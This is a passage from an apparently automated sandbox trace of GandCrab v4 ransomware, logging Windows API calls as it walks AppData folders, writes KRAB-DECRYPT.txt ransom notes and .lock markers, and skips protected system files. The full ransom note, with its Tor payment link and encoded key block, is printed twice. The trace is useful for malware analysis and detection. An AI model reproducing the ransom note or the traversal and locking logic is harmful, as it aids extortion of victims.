lpString1="C:\\Users\\Default\\", lpString2="AppData" | out: lpString1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0099.778] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\") returned="C:\\Users\\Default\\AppData\\" [0099.778] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0099.778] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0099.778] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0099.778] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0099.778] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0099.779] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.779] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.779] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\\\KRAB-DECRYPT.txt") returned 42 [0099.779] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0099.780] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0099.780] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0099.781] CloseHandle (hObject=0x320) returned 1 [0099.781] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.781] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.781] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2e, wMilliseconds=0x3d5)) [0099.781] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.782] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0099.782] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0099.782] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\d2ca4a08d2ca4dee3d.lock") returned 48 [0099.782] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\appdata\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0099.783] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.783] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.783] lstrlenW (lpString="C:\\Users\\Default\\AppData\\") returned 25 [0099.783] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\*") returned="C:\\Users\\Default\\AppData\\*" [0099.783] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbdfe0 [0099.784] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0099.784] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0099.784] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0099.784] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0099.784] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0099.784] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0099.784] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0099.784] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Default\\AppData\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Default\\AppData\\d2ca4a08d2ca4dee3d.lock" [0099.784] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.784] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 53 [0099.784] lstrlenW (lpString="C:\\Users\\Default\\AppData\\d2ca4a08d2ca4dee3d.lock") returned 48 [0099.784] lstrlenW (lpString=".lock") returned 5 [0099.784] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.785] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0099.785] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.785] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.785] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0099.785] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0099.785] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0099.785] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\AppData\\KRAB-DECRYPT.txt") returned="C:\\Users\\Default\\AppData\\KRAB-DECRYPT.txt" [0099.785] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.786] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\KRAB-DECRYPT.txt.KRAB") returned 46 [0099.786] lstrlenW (lpString="C:\\Users\\Default\\AppData\\KRAB-DECRYPT.txt") returned 41 [0099.786] lstrlenW (lpString=".txt") returned 4 [0099.786] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.786] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0099.786] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.786] lstrlenW (lpString="C:\\Users\\Default\\AppData\\KRAB-DECRYPT.txt") returned 41 [0099.787] lstrlenW (lpString="C:\\Users\\Default\\AppData\\KRAB-DECRYPT.txt") returned 41 [0099.787] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0099.787] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0099.787] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0099.787] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0099.787] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0099.787] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0099.787] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0099.787] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0099.787] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0099.787] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0099.787] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.787] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0099.787] lstrcmpW (lpString1="Local", lpString2=".") returned 1 [0099.787] lstrcmpW (lpString1="Local", lpString2="..") returned 1 [0099.787] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\", lpString2="Local" | out: lpString1="C:\\Users\\Default\\AppData\\Local") returned="C:\\Users\\Default\\AppData\\Local" [0099.787] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\") returned="C:\\Users\\Default\\AppData\\Local\\" [0099.787] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0099.788] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0099.788] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0099.788] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0099.788] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0099.788] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.788] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.788] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Local\\\\KRAB-DECRYPT.txt") returned 48 [0099.789] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\local\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0099.789] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0099.789] WriteFile (in: hFile=0x434, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338efa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338efa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0099.792] CloseHandle (hObject=0x434) returned 1 [0099.792] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.792] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.793] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2e, wMilliseconds=0x3e5)) [0099.793] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.793] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0099.793] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0099.793] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Local\\d2ca4a08d2ca4dee3d.lock") returned 54 [0099.793] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\appdata\\local\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x434 [0099.794] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.795] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.795] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\") returned 31 [0099.795] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\*") returned="C:\\Users\\Default\\AppData\\Local\\*" [0099.795] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\*", lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0xfbe0a0 [0099.795] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0099.795] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0099.796] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0099.796] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0099.796] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0099.796] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0099.796] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0099.796] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\", lpString2="Application Data" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Application Data") returned="C:\\Users\\Default\\AppData\\Local\\Application Data" [0099.796] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Application Data", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Application Data\\") returned="C:\\Users\\Default\\AppData\\Local\\Application Data\\" [0099.796] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0099.796] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0099.796] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0099.796] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0099.796] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0099.796] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.797] VirtualAlloc (lpAddress=0x0, dwSize=0x400, 